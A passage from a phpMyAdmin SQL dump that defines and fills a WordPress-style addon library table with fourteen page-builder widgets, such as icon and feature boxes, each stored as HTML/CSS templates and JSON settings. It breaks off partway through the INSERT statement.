-- phpMyAdmin SQL Dump
-- version 4.1.14.8
-- http://www.phpmyadmin.net
--
-- Host: db515496558.db.1and1.com
-- Generation Time: May 04, 2018 at 02:34 AM
-- Server version: 5.5.59-0+deb7u1-log
-- PHP Version: 5.4.45-0+deb7u13

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;

--
-- Database: `db515496558`
--

-- --------------------------------------------------------

--
-- Table structure for table `cyb_addonlibrary_addons`
--

CREATE TABLE IF NOT EXISTS `cyb_addonlibrary_addons` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `name` varchar(128) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `alias` varchar(128) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `addontype` varchar(128) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `description` text COLLATE utf8mb4_unicode_ci,
  `ordering` int(11) NOT NULL,
  `templates` text COLLATE utf8mb4_unicode_ci,
  `config` text COLLATE utf8mb4_unicode_ci,
  `catid` int(11) DEFAULT NULL,
  `is_active` tinyint(4) DEFAULT NULL,
  `test_slot1` text COLLATE utf8mb4_unicode_ci,
  `test_slot2` text COLLATE utf8mb4_unicode_ci,
  `test_slot3` text COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci AUTO_INCREMENT=65 ;

--
-- Dumping data for table `cyb_addonlibrary_addons`
--

INSERT INTO `cyb_addonlibrary_addons` (`id`, `title`, `name`, `alias`, `addontype`, `description`, `ordering`, `templates`, `config`, `catid`, `is_active`, `test_slot1`, `test_slot2`, `test_slot3`) VALUES
(1, 'Animated Feature Box', 'animated_feature_box_vc', 'animated_feature_box', 'vc', '', 1, '{"html":"<div class=\\"uc_animated_feature_box\\" style=\\"background-color:{{background_color}};\\">\\n\\t<i class=\\"{{icon}} uc_icon\\"><\\/i>\\n\\t<h3 class=\\"uc_title\\">{{title|raw}}<\\/h3>\\n\\t<span class=\\"uc_content\\">\\n      {{description|raw}}\\n    <\\/span>\\n<\\/div>\\n<!-- end of animated feature -->","css":".uc_animated_feature_box:hover {\\n\\tbackground-color:{{hover_color}} !important;\\n}"}', '{"options":{"enable_items":"false","path_assets":"animated_feature_box","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"true"},{"type":"uc_textarea","title":"Description","name":"description","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam sed maximus velit.","font_editable":"true"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-cubes"},{"type":"uc_colorpicker","title":"Background Color","name":"background_color","description":"","default_value":"#1c97f5"},{"type":"uc_colorpicker","title":"Hover Color","name":"hover_color","description":"","default_value":"#060d1a"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"https:\\/\\/maxcdn.bootstrapcdn.com\\/font-awesome\\/4.5.0\\/css\\/font-awesome.min.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Titillium+Web:300,600","condition":""},{"url":"animated_feature_box\\/animated_feature_box.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(2, 'Background Image Content Box', 'background_image_content_box_vc', 'background_image_content_box', 'vc', '', 2, '{"html":"<div class=\\"uc_background_image_content_box\\">\\n\\t\\t\\t<div class=\\"uc_item_link\\">\\n\\t\\t\\t\\t<!-- start of box content block -->\\n\\t\\t\\t\\t<div class=\\"uc_banner_box\\">\\n\\t\\t\\t\\t\\t<img src=\\"{{image}}\\" alt=\\"\\" class=\\"uc_item_img\\"\\/>\\n\\t\\t\\t\\t\\t<div class=\\"uc_item_html\\">\\n\\t\\t\\t\\t\\t\\t<h2 class=\\"uc_item_tittle\\">{{title|raw}}<\\/h2>\\n\\t\\t\\t\\t\\t\\t<p class=\\"uc_content_des\\">{{text|raw}}<\\/p>\\n\\t\\t\\t\\t\\t\\t<a class=\\"uc_btn\\"  href=\\"{{link}}\\">\\n\\t\\t\\t\\t\\t\\t\\t<span class=\\"uc_link_add\\">{{link_text|raw}}<\\/span>\\n\\t\\t\\t\\t\\t\\t<\\/a>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>"}', '{"options":{"enable_items":"false","path_assets":"background_image_content_box","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Awesome","font_editable":"true"},{"type":"uc_image","title":"Image","name":"image","description":"","add_thumb":"false","add_thumb_large":"false"},{"type":"uc_textarea","title":"Text","name":"text","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt ut labor.","font_editable":"true"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"http:\\/\\/www.google.com"},{"type":"uc_textfield","title":"Link Text","name":"link_text","description":"","admin_label":"false","default_value":"SHOP NOW!","font_editable":"true"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Lora:400,400italic,700,700italic","condition":""},{"url":"background_image_content_box\\/background_image_content_box.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(3, 'Bold Content Box', 'bold_content_box_vc', 'bold_content_box', 'vc', '', 3, '{"html":"<div class=\\"uc_bold_content_box\\">\\n    \\t<div class=\\"uc_container\\">\\n        \\t<div class=\\"uc_icon_box\\">\\n                <div class=\\"uc_icon_wrapper\\" style=\\"background-color:{{color}};\\"><i class=\\"{{icon}} uc_icon\\"><\\/i><\\/div>\\n                <h5>{{title|raw}}<\\/h5>\\n                <div class=\\"uc_text\\">{{text|raw}}<\\/div>\\n            <\\/div>\\n        <\\/div>\\n    <\\/div>","css":".uc_bold_content_box .uc_icon_box:hover {\\n    background-color:{{color}};\\n}"}', '{"options":{"enable_items":"false","path_assets":"bold_content_box","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"false"},{"type":"uc_textarea","title":"Text","name":"text","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt ut labor.","font_editable":"true"},{"type":"uc_colorpicker","title":"Color","name":"color","description":"","default_value":"#89c3e3"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-leaf"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"https:\\/\\/maxcdn.bootstrapcdn.com\\/font-awesome\\/4.6.1\\/css\\/font-awesome.min.css","condition":""},{"url":"bold_content_box\\/bold_content_box.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(4, 'Bold Icon Box', 'bold_icon_box_vc', 'bold_icon_box', 'vc', '', 4, '{"html":"<div class=\\"uc_bold_icon_box\\">\\n    \\t<div class=\\"bold_icon_box_container\\">\\n            <i class=\\"{{icon}}\\" aria-hidden=\\"true\\" style=\\"background-color:{{color}};\\"><\\/i>\\n            <div class=\\"bold_icon_box_content\\">\\n                <h3>{{title|raw}}<\\/h3>\\n                <p>{{content|raw}}<\\/p>\\n            <\\/div>\\n        <\\/div>\\n    <\\/div>"}', '{"options":{"enable_items":"false","path_assets":"bold_icon_box","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"High Quality","font_editable":"true"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod aliquam ut laoreet dolore magna tincidunt.","font_editable":"true"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-wrench"},{"type":"uc_colorpicker","title":"Color","name":"color","description":"","default_value":"#6e00f4"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"bold_icon_box\\/bold_icon_box.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,400italic,700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(5, 'Clean White Services Box', 'clean_white_services_box_vc', 'clean_white_services_box', 'vc', '', 5, '{"html":"<div class=\\"uc_clean_white_services_box\\">\\n\\t<span class=\\"uc_icon {{icon}}\\" style=\\"color:#000;\\"><\\/span>\\n\\t<a href=\\"{{title_link}}\\" class=\\"uc_title\\" style=\\"color:{{color}};\\">{{title|raw}}<\\/a>\\n\\t<p class=\\"uc_content\\">{{text|raw}}<\\/p>\\n<\\/div>","css":".uc_clean_white_services_box::before {\\n\\tbackground-color:{{color}};\\n}"}', '{"options":{"enable_items":"false","path_assets":"clean_white_services_box","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"true"},{"type":"uc_editor","title":"Text","name":"text","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy."},{"type":"uc_textfield","title":"Title Link","name":"title_link","description":"","default_value":"http:\\/\\/www.google.com"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-heart"},{"type":"uc_colorpicker","title":"color","name":"color","description":"","default_value":"#34ccdd"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"https:\\/\\/maxcdn.bootstrapcdn.com\\/font-awesome\\/4.6.1\\/css\\/font-awesome.min.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:300,700","condition":""},{"url":"clean_white_services_box\\/clean_white_services_box.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(6, 'Content Box Zoom Effect', 'content_box_zoom_effect_vc', 'content_box_zoom_effect', 'vc', '', 6, '{"html":"<div class=\\"uc_content_box_zoom_effect\\"> <a href=\\"{{link}}\\" class=\\"uc_thumbnail\\"> \\n  <img class=\\"uc_image\\" src=\\"{{image}}\\" \\/> <\\/a> \\n  \\n  <a href=\\"{{link}}\\" class=\\"uc_title\\">{{title|raw}}<\\/a>\\n  <p class=\\"uc_content\\">{{description|raw}}<\\/p>\\n  <a href=\\"{{link}}\\" class=\\"uc_more\\" style=\\"background-color:{{color}};\\">{{read_more_txt|raw}}<\\/a> \\n\\n<\\/div>"}', '{"options":{"enable_items":"false","path_assets":"content_box_zoom_effect","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"true"},{"type":"uc_image","title":"Image","name":"image","description":"","add_thumb":"false","add_thumb_large":"false"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"http:\\/\\/www.google.com"},{"type":"uc_textarea","title":"Description","name":"description","description":"","admin_label":"false","default_value":"This is some example text","font_editable":"true"},{"type":"uc_colorpicker","title":"Color","name":"color","description":"","default_value":"#4bc351"},{"type":"uc_textfield","title":"Read More Text","name":"read_more_txt","description":"","admin_label":"false","default_value":"More","font_editable":"true"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"content_box_zoom_effect\\/content_box_zoom_effect.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Lato","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(7, 'Elegant Icon Box', 'elegant_icon_box_vc', 'elegant_icon_box', 'vc', '', 7, '{"html":"<div class=\\"uc_elegant_icon_box\\" onclick=\\"javascript:location.href=''{{link}}''\\">\\n  <div class=\\"uc_tg_search_category\\">\\n    <div class=\\"uc_tg_displaytable\\">\\n      <div class=\\"uc_tg_displaytablecell\\">\\n        <div class=\\"uc_tg_box\\">\\n          <h3>{{title|raw}}<\\/h3>\\n          <i class=\\"{{icon}}\\"><\\/i><\\/div>\\n      <\\/div>\\n    <\\/div>\\n  <\\/div>\\n<\\/div>"}', '{"options":{"enable_items":"false","path_assets":"elegant_icon_box","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"true"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"true"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"http:\\/\\/www.google.com"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-leaf"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"https:\\/\\/maxcdn.bootstrapcdn.com\\/font-awesome\\/4.7.0\\/css\\/font-awesome.min.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,300,700,600|Montserrat:400,700","condition":""},{"url":"elegant_icon_box\\/elegant_icon_box.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(8, 'Four Colored Feature Boxs', 'four_colored_feature_boxs_vc', 'four_colored_feature_boxs', 'vc', '', 8, '{"html":"<!-- start of four colored feature boxes block -->\\n            <div class=\\"uc_four_colored_feature_boxes\\" style=\\"width: 100%;\\">\\n                <div class=\\"uc_row\\">\\n                    <div>\\n                        <ul class=\\"uc_servicesList\\">\\n                            {{put_items()}}\\n                        <\\/ul>\\n                    <\\/div>\\n                <\\/div>\\n            <\\/div>\\n            <!-- end of four colored feature boxes block -->","html_item":"<li class=\\"uc_box\\" style=\\" background: {{item.background}};\\">\\n  <span class=\\"uc_number\\" >{{item.number|raw}}<\\/span>\\n  <h3>{{item.title|raw}}<\\/h3>\\n  <p>{{item.description|raw}}<\\/p>\\n<\\/li>"}', '{"options":{"enable_items":"true","path_assets":"four_colored_feature_boxs","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":"","params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"false","default_value":"Default Title","font_editable":"true"},{"type":"uc_editor","title":"Description","name":"description","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras diam purus, sagittis quis augue et, dictum rhoncus ante. ","font_editable":"true"},{"type":"uc_textfield","title":"Number","name":"number","description":"","admin_label":"false","default_value":"1"},{"type":"uc_colorpicker","title":"Background","name":"background","description":"","admin_label":"false","default_value":"#333333"}],"includes":{"js":[],"jslib":[],"css":[{"url":"http:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700","condition":""},{"url":"four_colored_feature_boxs\\/four_colored_feature_boxs.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(9, 'Icon Image Content Box', 'icon_image_content_box_vc', 'icon_image_content_box', 'vc', '', 9, '{"html":"<div class=\\"uc_icon_image_content_box\\">\\t\\n        <div class=\\"uc_content_box_area\\" style=\\"border-bottom:3px solid {{box_color}};\\">\\n            <div class=\\"uc_thumb\\">\\n            \\t<img src=\\"{{box_image}}\\" alt=\\"\\">\\n            <\\/div>\\n            <div class=\\"uc_details\\">\\n            \\t<div class=\\"uc_details-icon\\"><i class=\\"{{box_icon}}\\" aria-hidden=\\"true\\" style=\\"color:{{box_color}};\\"><\\/i><\\/div>\\n            \\t<h4>{{box_title|raw}}<\\/h4>\\n              <p>{{box_content|raw}}<\\/p>\\n                <a href=\\"{{button_url}}\\" class=\\"uc_btn\\" style=\\"background-color:{{box_color}};\\">{{button_label|raw}}<\\/a>\\n            <\\/div>\\n        <\\/div>\\n    <\\/div>"}', '{"options":{"enable_items":"false","path_assets":"icon_image_content_box","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"box_title","description":"","admin_label":"true","default_value":"Sample Title","font_editable":"true"},{"type":"uc_image","title":"Image","name":"box_image","description":"","add_thumb":"false","add_thumb_large":"false","default_value":""},{"type":"uc_icon","title":"Icon","name":"box_icon","description":"","admin_label":"false","default_value":"fa fa-heart"},{"type":"uc_textarea","title":"Content","name":"box_content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetur adipisicing. Odit qui minima praesentium illo obcaecati...","font_editable":"true"},{"type":"uc_textfield","title":"Button Label","name":"button_label","description":"","admin_label":"false","default_value":"Show More","font_editable":"true"},{"type":"uc_textfield","title":"Button URL","name":"button_url","description":"","default_value":"#"},{"type":"uc_colorpicker","title":"Color","name":"box_color","description":"","default_value":"#159cf6"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"icon_image_content_box\\/icon_image_content_box.css","condition":""},{"url":"ttps:\\/\\/fonts.googleapis.com\\/css?family=Roboto:500","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Roboto+Condensed:700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(10, 'Image Content Box', 'image_content_box_vc', 'image_content_box', 'vc', '', 10, '{"html":"<div class=\\"uc_image-content-box\\">\\n        <div class=\\"uc_portfolio_gallery\\">\\n        \\t<ul>\\n            \\t<li>\\n                \\t<div class=\\"uc_portfolio_content\\">\\n                    \\t<img src=\\"{{image_one}}\\" alt=\\"\\">\\n                        \\t<div class=\\"uc_portfolio_overlay\\" style=\\"background-color:{{color}};\\">\\n                            \\t<a href=\\"{{link_one}}\\">\\n                                    <div class=\\"uc_porfolio_detail\\">\\n                                    \\t<i class=\\"{{icon_one}}\\"><\\/i>\\n                                    <\\/div>\\n                                    <h2>{{title_one|raw}}<\\/h2>\\n                                    <p>{{content_one|raw}}<\\/p>\\n                                    <div class=\\"uc_portfolio_link\\">\\n                                    \\t<i class=\\"fa fa-long-arrow-right\\"><\\/i>\\n                                    <\\/div>\\n                                <\\/a>\\n                            <\\/div>\\n                    <\\/div>\\n                <\\/li>\\n               \\n            <\\/ul>\\t\\n        <\\/div>\\n  <\\/div>"}', '{"options":{"enable_items":"false","path_assets":"image_content_box","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_image","title":"Image One","name":"image_one","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/pic1.jpg"},{"type":"uc_icon","title":"Icon One","name":"icon_one","description":"","admin_label":"false","default_value":"fa fa-camera"},{"type":"uc_textfield","title":"Title One","name":"title_one","description":"","default_value":"Birdy Ambush 1"},{"type":"uc_editor","title":"Content One","name":"content_one","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum. "},{"type":"uc_textfield","title":"Link One","name":"link_one","description":"","default_value":"https:\\/\\/www.google.com"},{"type":"uc_colorpicker","title":"Color","name":"color","description":"","default_value":"#4a41c8"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[{"url":"http:\\/\\/cdnjs.cloudflare.com\\/ajax\\/libs\\/waypoints\\/2.0.3\\/waypoints.min.js","condition":""}],"jslib":["jquery","font-awsome"],"css":[{"url":"image_content_box\\/image-content-box.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,300,600,700,800","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(11, 'Mega Icon Box', 'mega_icon_box_vc', 'mega_icon_box', 'vc', '', 11, '{"html":"<div class=\\"uc_mega_icon_box\\">\\n    \\t<div class=\\"uc_mega_icon_box_container\\">\\n            <span style=\\"background-color:{{color}};\\" class=\\"bbb\\"><i class=\\"{{icon}}\\" aria-hidden=\\"true\\" ><\\/i><\\/span>\\n            <div class=\\"mega_icon_box_content\\">\\n                <h3>{{title|raw}}<\\/h3>\\n                <p>{{content|raw}}<\\/p>\\n                <a class=\\"readmore\\" href=\\"{{link}}\\">{{button|raw}}<\\/a>\\n            <\\/div>\\n        <\\/div>\\n    <\\/div>"}', '{"options":{"enable_items":"false","path_assets":"mega_icon_box","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"High Quality","font_editable":"true"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod aliquam ut laoreet dolore magna tincidunt.","font_editable":"true"},{"type":"uc_textfield","title":"Button Text","name":"button","description":"","admin_label":"false","default_value":"read more","font_editable":"true"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"https:\\/\\/www.google.com"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-wrench"},{"type":"uc_colorpicker","title":"Color","name":"color","description":"","default_value":"#28bbff"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"mega_icon_box\\/mega_icon_box.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,400italic,700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(12, 'Mega Icon Content Box', 'mega_icon_content_box_vc', 'mega_icon_content_box', 'vc', '', 12, '{"html":"<div class=\\"uc_mega_icon_content_box uc_htmlcontent_home\\" style=\\"background-color:{{bg_color}};\\">\\n  <div class=\\"uc_htmlcontent_home\\"> <a href=\\"{{link}}\\">\\n    <div>\\n      <div class=\\"uc_item_html\\"> <i class=\\"{{icon}}\\"><\\/i>\\n        <h2> {{title|raw}}<\\/h2>\\n        <p>{{description|raw}}<\\/p>\\n      <\\/div>\\n    <\\/div>\\n    <\\/a> <\\/div>\\n<\\/div>"}', '{"options":{"enable_items":"false","path_assets":"mega_icon_content_box","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Lorem<br>ipsum dolor","font_editable":"true"},{"type":"uc_textarea","title":"Description","name":"description","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet conse ctetur adipi sicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.","font_editable":"true"},{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#3cdceb"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"http:\\/\\/www.google.com"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-cog"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"https:\\/\\/maxcdn.bootstrapcdn.com\\/font-awesome\\/4.6.1\\/css\\/font-awesome.min.css","condition":""},{"url":"mega_icon_content_box\\/mega_icon_content_box.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(13, 'Mega Icon Feature Box', 'mega_icon_feature_box_vc', 'mega_icon_feature_box', 'vc', '', 13, '{"html":"<div class=\\"uc_mega_icon_feature_boxs\\">\\n  <div class=\\"uc_features\\"> \\n    <!-- start of feature item -->\\n    <div class=\\"uc_features_item\\" style=\\"background-color:{{bg_color}};\\"> \\n      <i class=\\"{{icon}} uc_big_icon\\"><\\/i> \\n      <i class=\\"{{icon}} uc_big_small\\"><\\/i>\\n      <div class=\\"uc_description\\">\\n        <h5>{{title|raw}}<\\/h5>\\n        {{description|raw}} <\\/div>\\n    <\\/div>\\n  <\\/div>\\n<\\/div>"}', '{"options":{"enable_items":"false","path_assets":"mega_icon_feature_box","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"true"},{"type":"uc_textarea","title":"Description","name":"description","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras diam purus, sagittis quis augue et, dictum rhoncus ante. ","font_editable":"true"},{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#97c88d"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-heart"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"mega_icon_feature_box\\/mega_icon_feature_boxs.css","condition":""},{"url":"https:\\/\\/maxcdn.bootstrapcdn.com\\/font-awesome\\/4.0.3\\/css\\/font-awesome.min.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Roboto","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(14, 'Mega Icon Hover Effect', 'mega_icon_hover_effect_vc', 'mega_icon_hover_effect', 'vc', '', 14, '{"html":"<div class=\\"uc_mega_icon_hover_effect\\">\\n\\t<div class=\\"uc_detail\\">\\n\\t\\t<span class=\\"uc_icon {{icon}} fa-fw\\"><\\/span>\\n\\t\\t<h4 class=\\"uc_title\\">{{title|raw}}<\\/h4>\\n\\t\\t<p class=\\"uc_content\\">{{text|raw}}<\\/p>\\n\\t<\\/div>\\n<\\/div>"}', '{"options":{"enable_items":"false","path_assets":"mega_icon_hover_effect","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"true"},{"type":"uc_textarea","title":"Text","name":"text","description":"","admin_label":"false","default_value":"Duis autem vel eum iriure dolor in hendrerit","font_editable":"true"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-heart"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"mega_icon_hover_effect\\/mega_icon_hover_effect.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
